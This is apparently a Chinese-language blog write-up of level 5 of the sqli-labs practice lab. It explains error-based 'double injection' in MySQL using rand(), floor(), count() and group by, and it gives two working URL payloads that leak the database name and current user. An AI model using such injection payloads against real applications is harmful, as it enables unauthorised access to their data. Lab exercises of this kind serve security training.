sqli-labs

sqli-labs(5)

sqli-labs(5)

英文:114词 | 中文:640字

Posted by YY——阳阳 on December 7, 2020

前言

什么是双注入?

双注入就是嵌套子查询,多走一条查询或者数据排序途径,获取想要的数据,例如select …(select …),里面的那个select被称为子查询,它的执行顺序先执行子查询,然后再执行外面的select,双注入主要涉及到了几个sql函数利用:

rand()随机函数,返回0~1之间的某个值
floor(a)取整函数,返回小于等于a,且值最接近a的一个整数
count()聚合函数也称作计数函数,返回查询对象的总数
group by cluase分组语句,按照cluase对查询结果分组

原理

当一个字符串函数,例如concat函数后面如果使用分组语句就会把查询,的一部分以错误的形式显示出来。

payload

第一次结果得不到,那就那就在提交请求几次,因为rand是一个随机数;下面payload也是如此。

//爆库
?id=1' union select count(*),1,concat("-",(select database()), "-", floor(rand()*2 )) as a from information_schema.tables group by a --+
//爆user
?id=1' union select count(*),1,concat("-",(select user()), "-", floor(rand()*2 )) as a from information_schema.tables group by a --+

cF3EBF.png

CATALOG
    FEATURED TAGS
    小技巧 Blog Git 笔记 JAVA dvwa python sql注入 文件上传 sqli-labs Dos 渗透测试 网络攻击 AWD ctfshow
    FRIENDS